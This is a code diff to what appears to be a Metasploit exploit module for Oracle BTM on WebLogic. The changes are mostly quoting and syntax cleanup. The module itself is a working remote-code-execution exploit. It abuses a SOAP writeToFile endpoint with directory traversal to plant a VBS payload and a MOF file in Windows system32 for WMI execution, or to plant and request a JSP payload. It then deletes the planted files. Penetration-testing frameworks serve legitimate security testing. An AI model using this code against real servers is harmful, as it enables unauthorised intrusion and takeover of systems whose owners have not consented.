@@ -49,7 +49,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'Space' => 2048,
           'StackAdjustment' => -3500
         },
-        'Platform' => %w{java win},
         'Targets' => [
           [
             'Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java',
@@ -96,186 +95,184 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_new_session(client)
-    return if not @var_mof_name
-    return if not @var_vbs_name
+    return if !@var_mof_name
+    return if !@var_vbs_name
 
-    if client.type != "meterpreter"
-      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
+    if client.type != 'meterpreter'
+      print_error('NOTE: you must use a meterpreter payload in order to automatically cleanup.')
       print_error("The vbs payload (C:\\windows\\system32\\#{@var_vbs_name}.vbs) and mof file (C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof) must be removed manually.")
       return
     end
 
     # stdapi must be loaded before we can use fs.file
-    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+    client.core.use('stdapi') if !client.ext.aliases.include?('stdapi')
 
-    cmd = "C:\\windows\\system32\\attrib.exe -r " +
-          "C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"
+    cmd = 'C:\\windows\\system32\\attrib.exe -r ' +
+          'C:\\windows\\system32\\wbem\\mof\\good\\' + @var_mof_name + '.mof'
 
     client.sys.process.execute(cmd, nil, { 'Hidden' => true })
 
     begin
       print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...")
-      client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs")
+      client.fs.file.rm('C:\\windows\\system32\\' + @var_vbs_name + '.vbs')
       print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...")
-      client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof")
+      client.fs.file.rm('C:\\windows\\system32\\wbem\\mof\\good\\' + @var_mof_name + '.mof')
     rescue ::Exception => e
       print_error("Exception: #{e.inspect}")
     end
   end
 
   def exploit
-    peer = "#{rhost}:#{rport}"
-
     if target.name =~ /WMI/
 
       # In order to save binary data to the file system the payload is written to a .vbs
       # file and execute it from there.
-      @var_mof_name = rand_text_alpha(rand(5) + 5)
-      @var_vbs_name = rand_text_alpha(rand(5) + 5)
+      @var_mof_name = rand_text_alpha(rand(5..9))
+      @var_vbs_name = rand_text_alpha(rand(5..9))
 
-      print_status("Encoding payload into vbs...")
+      print_status('Encoding payload into vbs...')
       my_payload = generate_payload_exe
       vbs_content = Msf::Util::EXE.to_exe_vbs(my_payload)
 
-      print_status("Generating mof file...")
+      print_status('Generating mof file...')
       mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")
 
-      if not datastore['DEPTH'] or datastore['DEPTH'] == 0
-        traversal = "..\\" * target['Depth']
+      if !(datastore['DEPTH']) or datastore['DEPTH'] == 0
+        traversal = '..\\' * target['Depth']
       else
-        traversal = "..\\" * datastore['DEPTH']
+        traversal = '..\\' * datastore['DEPTH']
       end
       traversal << "WINDOWS\\system32\\#{@var_vbs_name}.vbs"
 
-      print_status("Uploading the VBS payload")
+      print_status('Uploading the VBS payload')
 
-      soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
-      soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" "
-      soap_request << "xmlns:typ=\"http://schemas.amberpoint.com/flashtunnel/types\">"
-      soap_request << "	<soapenv:Header/>"
-      soap_request << "	<soapenv:Body>"
-      soap_request << "		<int:writeToFileRequest>"
+      soap_request = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
+      soap_request << 'xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" '
+      soap_request << 'xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">'
+      soap_request << "\t<soapenv:Header/>"
+      soap_request << "\t<soapenv:Body>"
+      soap_request << "\t\t<int:writeToFileRequest>"
       soap_request << "			<int:writeToFile handle=\"#{traversal}\">"
       soap_request << "				<typ:text>#{Rex::Text.html_encode(vbs_content)}</typ:text>"
-      soap_request << "				<typ:WriteToFileRequestVersion>"
-      soap_request << "				</typ:WriteToFileRequestVersion>"
-      soap_request << "			</int:writeToFile>"
-      soap_request << "		</int:writeToFileRequest>"
-      soap_request << "	</soapenv:Body>"
-      soap_request << "</soapenv:Envelope>"
+      soap_request << "\t\t\t\t<typ:WriteToFileRequestVersion>"
+      soap_request << "\t\t\t\t</typ:WriteToFileRequestVersion>"
+      soap_request << "\t\t\t</int:writeToFile>"
+      soap_request << "\t\t</int:writeToFileRequest>"
+      soap_request << "\t</soapenv:Body>"
+      soap_request << '</soapenv:Envelope>'
 
       res = send_request_cgi(
         {
           'uri' => '/btmui/soa/flash_svc/',
           'version' => '1.1',
           'method' => 'POST',
-          'ctype' => "text/xml;charset=UTF-8",
-          'SOAPAction' => "\"http://soa.amberpoint.com/writeToFile\"",
-          'data' => soap_request,
+          'ctype' => 'text/xml;charset=UTF-8',
+          'SOAPAction' => '"http://soa.amberpoint.com/writeToFile"',
+          'data' => soap_request
         }, 5
       )
 
       if res and res.code == 200 and res.body =~ /writeToFileResponse/
-        print_good("VBS payload successfully uploaded")
+        print_good('VBS payload successfully uploaded')
       else
-        print_error("Failed to upload the VBS payload")
+        print_error('Failed to upload the VBS payload')
         return
       end
 
-      if not datastore['DEPTH'] or datastore['DEPTH'] == 0
-        traversal = "..\\" * target['Depth']
+      if !(datastore['DEPTH']) or datastore['DEPTH'] == 0
+        traversal = '..\\' * target['Depth']
       else
-        traversal = "..\\" * datastore['DEPTH']
+        traversal = '..\\' * datastore['DEPTH']
       end
       traversal << "WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof"
 
-      soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
-      soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" "
-      soap_request << "xmlns:typ=\"http://schemas.amberpoint.com/flashtunnel/types\">"
-      soap_request << "	<soapenv:Header/>"
-      soap_request << "	<soapenv:Body>"
-      soap_request << "		<int:writeToFileRequest>"
+      soap_request = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
+      soap_request << 'xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" '
+      soap_request << 'xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">'
+      soap_request << "\t<soapenv:Header/>"
+      soap_request << "\t<soapenv:Body>"
+      soap_request << "\t\t<int:writeToFileRequest>"
       soap_request << "			<int:writeToFile handle=\"#{traversal}\">"
       soap_request << "				<typ:text>#{Rex::Text.html_encode(mof_content)}</typ:text>"
-      soap_request << "				<typ:WriteToFileRequestVersion>"
-      soap_request << "				</typ:WriteToFileRequestVersion>"
-      soap_request << "			</int:writeToFile>"
-      soap_request << "		</int:writeToFileRequest>"
-      soap_request << "	</soapenv:Body>"
-      soap_request << "</soapenv:Envelope>"
+      soap_request << "\t\t\t\t<typ:WriteToFileRequestVersion>"
+      soap_request << "\t\t\t\t</typ:WriteToFileRequestVersion>"
+      soap_request << "\t\t\t</int:writeToFile>"
+      soap_request << "\t\t</int:writeToFileRequest>"
+      soap_request << "\t</soapenv:Body>"
+      soap_request << '</soapenv:Envelope>'
 
-      print_status("Uploading the MOF file")
+      print_status('Uploading the MOF file')
 
       res = send_request_cgi(
         {
           'uri' => '/btmui/soa/flash_svc/',
           'version' => '1.1',
           'method' => 'POST',
-          'ctype' => "text/xml;charset=UTF-8",
-          'SOAPAction' => "\"http://soa.amberpoint.com/writeToFile\"",
-          'data' => soap_request,
+          'ctype' => 'text/xml;charset=UTF-8',
+          'SOAPAction' => '"http://soa.amberpoint.com/writeToFile"',
+          'data' => soap_request
         }, 5
       )
 
       if res and res.code == 200 and res.body =~ /writeToFileResponse/
-        print_good("MOF file successfully uploaded")
+        print_good('MOF file successfully uploaded')
       else
-        print_error("Failed to upload the MOF file")
+        print_error('Failed to upload the MOF file')
         return
       end
 
     elsif target['Arch'] == ARCH_JAVA
 
-      @jsp_name = rand_text_alpha(rand(5) + 5)
+      @jsp_name = rand_text_alpha(rand(5..9))
 
-      if not datastore['DEPTH'] or datastore['DEPTH'] == 0
-        traversal = "..\\" * target['Depth']
+      if !(datastore['DEPTH']) or datastore['DEPTH'] == 0
+        traversal = '..\\' * target['Depth']
       else
-        traversal = "..\\" * datastore['DEPTH']
+        traversal = '..\\' * datastore['DEPTH']
       end
       traversal << "\\server\\examples\\build\\mainWebApp\\#{@jsp_name}.jsp"
 
-      print_status("Uploading the JSP payload")
+      print_status('Uploading the JSP payload')
 
-      soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" "
-      soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" "
-      soap_request << "xmlns:typ=\"http://schemas.amberpoint.com/flashtunnel/types\">"
-      soap_request << "	<soapenv:Header/>"
-      soap_request << "	<soapenv:Body>"
-      soap_request << "		<int:writeToFileRequest>"
+      soap_request = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
+      soap_request << 'xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" '
+      soap_request << 'xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">'
+      soap_request << "\t<soapenv:Header/>"
+      soap_request << "\t<soapenv:Body>"
+      soap_request << "\t\t<int:writeToFileRequest>"
       soap_request << "			<int:writeToFile handle=\"#{traversal}\">"
       soap_request << "				<typ:text>#{Rex::Text.html_encode(payload.encoded)}</typ:text>"
-      soap_request << "				<typ:WriteToFileRequestVersion>"
-      soap_request << "				</typ:WriteToFileRequestVersion>"
-      soap_request << "			</int:writeToFile>"
-      soap_request << "		</int:writeToFileRequest>"
-      soap_request << "	</soapenv:Body>"
-      soap_request << "</soapenv:Envelope>"
+      soap_request << "\t\t\t\t<typ:WriteToFileRequestVersion>"
+      soap_request << "\t\t\t\t</typ:WriteToFileRequestVersion>"
+      soap_request << "\t\t\t</int:writeToFile>"
+      soap_request << "\t\t</int:writeToFileRequest>"
+      soap_request << "\t</soapenv:Body>"
+      soap_request << '</soapenv:Envelope>'
 
       res = send_request_cgi(
         {
           'uri' => '/btmui/soa/flash_svc/',
           'version' => '1.1',
           'method' => 'POST',
-          'ctype' => "text/xml;charset=UTF-8",
-          'SOAPAction' => "\"http://soa.amberpoint.com/writeToFile\"",
-          'data' => soap_request,
+          'ctype' => 'text/xml;charset=UTF-8',
+          'SOAPAction' => '"http://soa.amberpoint.com/writeToFile"',
+          'data' => soap_request
         }, 5
       )
 
       if res and res.code == 200 and res.body =~ /writeToFileResponse/
-        print_status("JSP payload successfully uploaded")
+        print_status('JSP payload successfully uploaded')
       else
-        print_error("Failed to upload the JSP payload")
+        print_error('Failed to upload the JSP payload')
         return
       end
 
       print_status("Executing the uploaded JSP #{@jsp_name}.jsp ...")
-      res = send_request_cgi(
+      send_request_cgi(
         {
           'uri' => "/#{@jsp_name}.jsp",
           'version' => '1.1',
-          'method' => 'GET',
+          'method' => 'GET'
         }, 5
       )
 
